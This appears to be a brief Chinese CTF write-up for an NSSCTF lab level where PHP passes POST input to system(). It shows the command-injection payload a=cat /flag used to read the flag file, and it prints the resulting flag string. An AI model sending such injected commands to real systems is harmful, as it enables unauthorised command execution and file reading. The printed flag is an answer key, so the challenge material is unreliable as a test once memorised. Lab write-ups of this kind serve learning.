开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
nvvas7 分钟前
PHP imagick扩展安装以及应用Websites1 小时前
Hyperf 百度翻译接口实现方案yzx9910134 小时前
PHP 开发全解析:从基础到实战的进阶之路菜根Sec5 小时前
Sqli-labs靶场搭建及报错处理梦吉网络5 小时前
在线进销存系统高效管理网站源码搭建可二开啊阿狸不会拉杆10 小时前
《算法导论》第 24 章 - 单源最短路径衍余未了10 小时前
Centos9傻瓜式linux部署CRMEB 开源商城系统(PHP)AI偶然11 小时前
AI智能体|扣子(Coze)搭建【批量识别发票并录入飞书】Agent小韩博11 小时前
网络安全(Java语言)简单脚本汇总 (一)浩浩测试一下12 小时前
02高级语言逻辑结构到汇编语言之逻辑结构转换 if (...) {...} else {...} 结构